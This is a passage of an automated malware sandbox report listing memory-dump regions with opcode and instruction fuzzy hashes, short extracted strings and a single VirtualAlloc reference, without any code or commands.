                                          • Opcode Fuzzy Hash: a97aae9da15ca86ead8483b75d8a933b624ffd1b58e6541201bf6c899a3c7f08
                                          • Instruction Fuzzy Hash: 4A41CF31B006168FCB50CF69C884A6AFBB5FF8A320F158695D5659B792C730EC45CBE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'jq
                                          • API String ID: 0-3676250632
                                          • Opcode ID: f003d7a9d65691b8845d17e59e56f34974ba6977405fc2c6566d0eb5513afe29
                                          • Instruction ID: c76ecd1619434f4a0e239e4844c2a3f472cd500711111cba4b2000c69a462d02
                                          • Opcode Fuzzy Hash: f003d7a9d65691b8845d17e59e56f34974ba6977405fc2c6566d0eb5513afe29
                                          • Instruction Fuzzy Hash: EB41AF317406009FD348DB69C958F2B7BAAAFC8714F114569E60ACF3A5DE75EC02C7A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'jq
                                          • API String ID: 0-3676250632
                                          • Opcode ID: b108c809bb617b56be60f0573c1f21f41cedf9c629409fcc466a8058c261ffe7
                                          • Instruction ID: e0a06643d45efe397afca3e7873ee26acb5cc51e0997da02db5d4a90b733829b
                                          • Opcode Fuzzy Hash: b108c809bb617b56be60f0573c1f21f41cedf9c629409fcc466a8058c261ffe7
                                          • Instruction Fuzzy Hash: 32319A317406019FD348DB69C998F2B77EAAFC8704F104568E60A8B3A5DE75EC42CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'jq
                                          • API String ID: 0-3676250632
                                          • Opcode ID: 8a5b4338489f6bbdf13d75f373b6fa1ce23e8a9d6a24babde5fda5770f9bae65
                                          • Instruction ID: ee672c6d9e5cbab325b8435f5d3eee9c93692d60debcd19027bc901f37e6ff23
                                          • Opcode Fuzzy Hash: 8a5b4338489f6bbdf13d75f373b6fa1ce23e8a9d6a24babde5fda5770f9bae65
                                          • Instruction Fuzzy Hash: E531C135600200DFCB459F64D958D9A7BB7FF89310F0640A9EA0AAB275CA32DC02CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nq
                                          • API String ID: 0-2756854522
                                          • Opcode ID: 061f2dd3b083e3e48bd2f26d91446079eeecf6357f214280328c05d1179e0183
                                          • Instruction ID: 2c69ec1854c8eb0dff1efa0b8c30622dc7938dd6ac35ba500bda25c6bcf540bf
                                          • Opcode Fuzzy Hash: 061f2dd3b083e3e48bd2f26d91446079eeecf6357f214280328c05d1179e0183
                                          • Instruction Fuzzy Hash: 0431F5367042556FDB146E6DD8409AF7BABEFCA320B15403AF909CB7A5CE718C16C7A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133069233.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'jq
                                          • API String ID: 0-3676250632
                                          • Opcode ID: b30a0624b60b4c1e0251811e847c94ce0999bd3c781edfe94c574110d7422bf1
                                          • Instruction ID: 5102db452a5e48abec28c8063bf708e14e64f2bd1eefd244587effeb065d43ed
                                          • Opcode Fuzzy Hash: b30a0624b60b4c1e0251811e847c94ce0999bd3c781edfe94c574110d7422bf1
                                          • Instruction Fuzzy Hash: E0318730D09249CFDB15CFA9D8046EEBBB5FF85301F1184AAE811A7692D7385E46CFA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: p<jq
                                          • API String ID: 0-3743064563
                                          • Opcode ID: 471f661129e7c6a0321684474ef04ffece71d38ebd42cb3f4077f8ec676ca829
                                          • Instruction ID: bc9481f865a474efe153b45a0682fb43ea8606323cc9770dc900a9adefd6ad3c
                                          • Opcode Fuzzy Hash: 471f661129e7c6a0321684474ef04ffece71d38ebd42cb3f4077f8ec676ca829
                                          • Instruction Fuzzy Hash: 8E2191703042959FCB45CF2ACC54AAA7BE5AF4E214B094095FD54CB361CA35DE50CB20
                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 068FF2A3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132942549.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_68f0000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: c9a1f13ae518d0efe59c4bf478e841fbe47bc33737694b46a3f37ca56d4f319f
                                          • Instruction ID: 62d41491e6b932399e779b6e24f7daa196c1f434a8ee4a736a61735398d422f9
                                          • Opcode Fuzzy Hash: c9a1f13ae518d0efe59c4bf478e841fbe47bc33737694b46a3f37ca56d4f319f
                                          • Instruction Fuzzy Hash: 8A1107759002499FDB10DFAAC845BEFBBF5EF88720F148419D619A7250CB79A544CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: &
                                          • API String ID: 0-1010288
                                          • Opcode ID: 43919e47e402549e9a9daaa9e312d768103eb715e99d91f47c147ec30959a825
                                          • Instruction ID: adf4f3cb0f196e96251dbcc5f2436722d3caacf0c7640ff662e375e7add688fc
                                          • Opcode Fuzzy Hash: 43919e47e402549e9a9daaa9e312d768103eb715e99d91f47c147ec30959a825
                                          • Instruction Fuzzy Hash: D5017EB4E01A28CFEF60CF29DC45B9ABBB1BB4D316F0080E9D50EA2641E7345E818F15
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: o
                                          • API String ID: 0-252678980
                                          • Opcode ID: e5f716a8109c74304ae0a9da657f408da38abdecf0980c32e85a7f28388febd4
                                          • Instruction ID: 4a6705a44879f81dd9b9791db669d2cf4249ab3c7545e0705353014f239f2340
                                          • Opcode Fuzzy Hash: e5f716a8109c74304ae0a9da657f408da38abdecf0980c32e85a7f28388febd4
                                          • Instruction Fuzzy Hash: B8F0CD749042188FEB94DF58C88876977B1EB49304F0050D69609A7645DA34AE89CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: a50ff18e3d0a5e352d4cd2bcfabf057d766af9dc53084fe5a0fd8fd0e736ef70
                                          • Instruction ID: 9574e71d6d236fa82d83d8cbfa9c2db61d7a71c32883ec9b56a9f60c71d2dce9
                                          • Opcode Fuzzy Hash: a50ff18e3d0a5e352d4cd2bcfabf057d766af9dc53084fe5a0fd8fd0e736ef70
                                          • Instruction Fuzzy Hash: C0F0F878A102288FDB50DF68C89178EBBB2FF89300F0001D99549A7345D7305E44CF11
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: X
                                          • API String ID: 0-3081909835
                                          • Opcode ID: 06b6f0cc749cee14a5ca7661247f2759254b7cc5d2609bc099e1c1ee38452ce0
                                          • Instruction ID: 6d36009ddeb5c25eb94db8d3c8b8301dca17c62c17a57d5a016338f3040a2991
                                          • Opcode Fuzzy Hash: 06b6f0cc749cee14a5ca7661247f2759254b7cc5d2609bc099e1c1ee38452ce0
                                          • Instruction Fuzzy Hash: 45D017B8C04368CEDF909F28C89178AB7B0EB00781F0084EA880C66102DA314B889F75
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8887fd48eadd1699aa9fc9078973e333f400b6160ade8e5327e7df6f18cbaa7
                                          • Instruction ID: 7e040c4aee5e077291c3a6eb474a9e71c18d7442820ae35262fe6d021bc5ca55
                                          • Opcode Fuzzy Hash: d8887fd48eadd1699aa9fc9078973e333f400b6160ade8e5327e7df6f18cbaa7
                                          • Instruction Fuzzy Hash: B712FA34A003198FCB94EF68C994A9DB7B2BF89304F5185A8D54AAB365DF30ED85CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef20d6fdf413c887393607499a18d084ed610430ba4bffd991697a8349ebb8d4
                                          • Instruction ID: d8789fe64fea1b040df7c6e145c611263b359659c4d4e08a1eace340eadd44e5
                                          • Opcode Fuzzy Hash: ef20d6fdf413c887393607499a18d084ed610430ba4bffd991697a8349ebb8d4
                                          • Instruction Fuzzy Hash: EBC10730A043458FCB76DF29D454A2ABBF2BFC5308F19855DE896CB652CB30E941CB50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d976b49d2083ff402b5d2a4f0c38ee5caf04cd7b4952c95a05663ab8e75653ab
                                          • Instruction ID: 6ba84204ecd015a6324af3804f490bdcbc65247819055c453ca926f200cbdb82
                                          • Opcode Fuzzy Hash: d976b49d2083ff402b5d2a4f0c38ee5caf04cd7b4952c95a05663ab8e75653ab
                                          • Instruction Fuzzy Hash: A8919C35B012049FDB55CFA8E844AADBBF6FF88311F258069E905AB790DB31DD41CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 700c6efeb8a7ba37a1dcb44a27907404a0d5b234625053c395c48942db916182
                                          • Instruction ID: ad79153cab307f6182e3870435552368eccf5ada56f78acb2d82f7bc0c496ce1
                                          • Opcode Fuzzy Hash: 700c6efeb8a7ba37a1dcb44a27907404a0d5b234625053c395c48942db916182
                                          • Instruction Fuzzy Hash: 31A10734A003158FDB54DF64C998B99BBB2BF89304F5085A8E54AAB365DF30EE85CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1e78c067d651345595cfb1799457ea02cd3e79012cd0dc1b4838bbe2b12d960
                                          • Instruction ID: aaddf4fd134a61ecad7b155dcf69c8670d6f54fb712760638c52624ca83e5674
                                          • Opcode Fuzzy Hash: b1e78c067d651345595cfb1799457ea02cd3e79012cd0dc1b4838bbe2b12d960
                                          • Instruction Fuzzy Hash: 1A814B34B10215DFCB84EF68D898AADBBB6BF89714F1441A9E506DB3A1CB30DD41CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 81b14a8962247f17c0744dc878a44d66a7add94b82a0f1fb3acf4ffeedce1608
                                          • Instruction ID: ba32e393d69bbc28ddd6f6ca2fef5053157f4ad7059ea07f9d3ad74f67a59e24
                                          • Opcode Fuzzy Hash: 81b14a8962247f17c0744dc878a44d66a7add94b82a0f1fb3acf4ffeedce1608
                                          • Instruction Fuzzy Hash: F4812735A00219CFCB58DF69C58499EB7F5EF88315B1581AAE806DB374DB70ED41CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a13808e84417170324e833d2f0018e5f68a9beaee038da65de387e8ef856473a
                                          • Instruction ID: fe68797c3dc5129d7134b8456642e16b214de41a21239b68c0bd5f5b0467e5f7
                                          • Opcode Fuzzy Hash: a13808e84417170324e833d2f0018e5f68a9beaee038da65de387e8ef856473a
                                          • Instruction Fuzzy Hash: F1613A34B10215DFCB44DF68D898AADB7B6FF89714F1081A9E5169B3A5CB30ED41CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4bad93666ebd7a448bc0d93c6e7023f7746ab23249f2dd9ff57ee26f7420fdc9
                                          • Instruction ID: 1d327cd2c641bb847458215010bf8618e12a21074272985646460ffe386e9a14
                                          • Opcode Fuzzy Hash: 4bad93666ebd7a448bc0d93c6e7023f7746ab23249f2dd9ff57ee26f7420fdc9
                                          • Instruction Fuzzy Hash: 37510274B002058FCB44DF68C994AAA7BF6BF89704F1540AAE509DB3B4DB70ED41CB60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 512e98424d924ea9d05e6bcbb9ef313a7da4cea6c30d29d7d6d419a951b49ef2
                                          • Instruction ID: 749f84139619a221bd87159c3e8c5b72f0c5849b409eb343a756ff13ce46330f
                                          • Opcode Fuzzy Hash: 512e98424d924ea9d05e6bcbb9ef313a7da4cea6c30d29d7d6d419a951b49ef2
                                          • Instruction Fuzzy Hash: 24511274E05218CFDB84EFA9E8446EEBBF6FB89300F10A52AD515B7249D7345905CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1da05de76024c66c0b76414bdea38a59c8c2042ebeaef6ce3bf40324fd4fb0b4
                                          • Instruction ID: 8d7036e62e9e31f9263181290657e3a1a1afbdea9a686ee6a57fb2b8803f95b3
                                          • Opcode Fuzzy Hash: 1da05de76024c66c0b76414bdea38a59c8c2042ebeaef6ce3bf40324fd4fb0b4
                                          • Instruction Fuzzy Hash: DD518034B106099FCB04EF64E598AAEBBB7FFC9711F008129E5029B764DF709906CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b2bae6bbcf5462876b77edcac983adee3fcc3b77525cc379056d0acdd8da10f9
                                          • Instruction ID: 2370e480fe97ec9d2eae7c7b9e5168b7738d0d840b61096b5f792c93836c298b
                                          • Opcode Fuzzy Hash: b2bae6bbcf5462876b77edcac983adee3fcc3b77525cc379056d0acdd8da10f9
                                          • Instruction Fuzzy Hash: 9E51F470E11218DFEBA4CF69D884BADBBB2BF45304F1484AAD408A7755DB709E84CF10
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29c7bc443389c2bf5af5ccff28e6764d4319f9304cfc5d927438231ab2885b9e
                                          • Instruction ID: 1419136bf24e45a96ad7734b2d2b2e8f50de20a249335b8750c9b5a28dd40d68
                                          • Opcode Fuzzy Hash: 29c7bc443389c2bf5af5ccff28e6764d4319f9304cfc5d927438231ab2885b9e
                                          • Instruction Fuzzy Hash: E951E370E11218DFEBA4CF69D984BADBBB2BF45304F1484AAD508A7795DB705E84CF20
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e0f7d4b4fb9d3b9c341c064343792d109bfca98bf27adaa61c812b9a4e379f0
                                          • Instruction ID: 8da54a55039213359223b4c2b7e0a6f8c10744f558b948a04345b2da056235bf
                                          • Opcode Fuzzy Hash: 0e0f7d4b4fb9d3b9c341c064343792d109bfca98bf27adaa61c812b9a4e379f0
                                          • Instruction Fuzzy Hash: A741BE31F047159FCBA0DF78D65469EBBF2EF84614F04896ED46AC7A94DA30E901CB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd17315661bc73ae16619b24e71b04a54fcd45bd8b61492fc44b544beebacf1c
                                          • Instruction ID: f08f7f43ad945410a39419809a3e8d5f909996cd3e187de6e45e2f5a97497fc4
                                          • Opcode Fuzzy Hash: cd17315661bc73ae16619b24e71b04a54fcd45bd8b61492fc44b544beebacf1c
                                          • Instruction Fuzzy Hash: 2A419A31E007458FCB61CF69C944A6ABBF2FF88304F14895DD59687A51DB30E904CFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 723d7094f5069af66b91388b8a68a21ff5f4739f651b8603e1c0cfd960156309
                                          • Instruction ID: 8454d8a984a240d637559174cf738c6b6666daa48c85d5954adeef5da9aa3fca
                                          • Opcode Fuzzy Hash: 723d7094f5069af66b91388b8a68a21ff5f4739f651b8603e1c0cfd960156309
                                          • Instruction Fuzzy Hash: 36417C30B00205DFDB94DB68D895B6AB7F6EF84700F188429E906DBA54DB35E801CBA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d36541b61ec4bbe3bf161cdd9792131f61322fcce9620a9f2a0b6562f0725da9
                                          • Instruction ID: a43f25ab63952f4ef80f726d6f2a0c9928006cb9543a0de2a173a59d9b8f5752
                                          • Opcode Fuzzy Hash: d36541b61ec4bbe3bf161cdd9792131f61322fcce9620a9f2a0b6562f0725da9
                                          • Instruction Fuzzy Hash: 5C41E474E01218CFDB58DFB9D594ADDBBB2EF88310F20812AE819AB365DB359941CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c7eddbb6cd5a9bdc4c585ee29800ccb0bb554ce436ee16cee8ed53347ded2df5
                                          • Instruction ID: a551e1d0745c65a13610a9ad404ee3496d24fc27941c109c4e37f0aeb2c5083d
                                          • Opcode Fuzzy Hash: c7eddbb6cd5a9bdc4c585ee29800ccb0bb554ce436ee16cee8ed53347ded2df5
                                          • Instruction Fuzzy Hash: 9351C274E01208DFDB58DFB9D594A9DBBB2FF88310F20812AE816AB365DB359941CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4209954328d7b68bc773a938ee12f53341f1c292572c9778d917e0ee47079d14
                                          • Instruction ID: 278d65d6efd8a29a144b9ca0740f3d4b4e427a1c47b4f71e9223efa3522d83a3
                                          • Opcode Fuzzy Hash: 4209954328d7b68bc773a938ee12f53341f1c292572c9778d917e0ee47079d14
                                          • Instruction Fuzzy Hash: AC319974E09208DFCB40DFA8C8046EEBBB9FB89310F50846AD505B3250DB795E25CFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d536320d7f509674e5bba371f738767cd72f65f23dec093e85798de28f970d70
                                          • Instruction ID: e2a9ba8e234be0024535016728316788652000ac940d27d75681f259c3c213b4
                                          • Opcode Fuzzy Hash: d536320d7f509674e5bba371f738767cd72f65f23dec093e85798de28f970d70
                                          • Instruction Fuzzy Hash: F641F934A012189FEBA5DF24CD91FA9B7B1FB99714F1001D9EA09AB391C631ED81CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 724e579ed54a302ccb3b6a8387e486039f19b7031380688a4cc1a4f613f4b050
                                          • Instruction ID: 2264e8cdffdf5d6995df923acf78537e12c03fc2e65e0e411f4db48891aa78f5
                                          • Opcode Fuzzy Hash: 724e579ed54a302ccb3b6a8387e486039f19b7031380688a4cc1a4f613f4b050
                                          • Instruction Fuzzy Hash: 11410870E042089FEB44DFADE44469EBBF2FB89310F148069D519B7359D738A905CFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34c7b0cc5fbcb6d369c798fd55583d579e1dc27a3a4d0dfe9773ac75c5a11925
                                          • Instruction ID: ba262153e20b42ae84abc6ad55d27e0ef248ef192c780a922ab2d78a7c1de6fa
                                          • Opcode Fuzzy Hash: 34c7b0cc5fbcb6d369c798fd55583d579e1dc27a3a4d0dfe9773ac75c5a11925
                                          • Instruction Fuzzy Hash: 05310636A11105AFCB45DF98D988E99BBB2FF49324F0680A8E6099F372C731ED55CB40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e3fe520c469b73350c322921578ff48d7ddf7393b0a54af3fe05e6d1b573117d
                                          • Instruction ID: 67939ad1ecfb2cc9d2cb6568240fdd646c19bcd6803379e04559cdfd3600da66
                                          • Opcode Fuzzy Hash: e3fe520c469b73350c322921578ff48d7ddf7393b0a54af3fe05e6d1b573117d
                                          • Instruction Fuzzy Hash: 4E41F570E04208DFEB44DFAEE4446AEBBF6FB89310F108469D519A7259D738A945CFA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d2d14034069ed9ff4494ed014fb5d4def42e60e6fc6a7daa9dbc0735b4abed3
                                          • Instruction ID: d6168576e57a4c1d8302e2ba560742f6935ee73bd21348e1f39ebedca9f17040
                                          • Opcode Fuzzy Hash: 1d2d14034069ed9ff4494ed014fb5d4def42e60e6fc6a7daa9dbc0735b4abed3
                                          • Instruction Fuzzy Hash: 48313E31A0021A9FDF54DFA5D855AEEBBB5FF88310F108029D812B73A4CB31AD05CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 38e2a3fe6d885269cac32c190e759ee9b1f9026e64d2d1b76a2073c9f3774bae
                                          • Instruction ID: ea3c8ded15bf11b5271910fc613417f9a1d45e67fffb55bb51d9d5c744366e5b
                                          • Opcode Fuzzy Hash: 38e2a3fe6d885269cac32c190e759ee9b1f9026e64d2d1b76a2073c9f3774bae
                                          • Instruction Fuzzy Hash: A241F670D04218CFEFA4DF99C8447AEBBB2FB89305F1094A9E409A7654E774AD81CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3782973c3ec12024414939eeb8e8fddd20608004f150f848c97be19c041f1792
                                          • Instruction ID: d94d781720a7b7461de0ea96682dfb43b8aec7b430378ec3bdddae77a9574d8e
                                          • Opcode Fuzzy Hash: 3782973c3ec12024414939eeb8e8fddd20608004f150f848c97be19c041f1792
                                          • Instruction Fuzzy Hash: D731AC312003469FCB55CF29D884AAA7BBAEF44348F11816DF909CB2A0CB35DD55CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
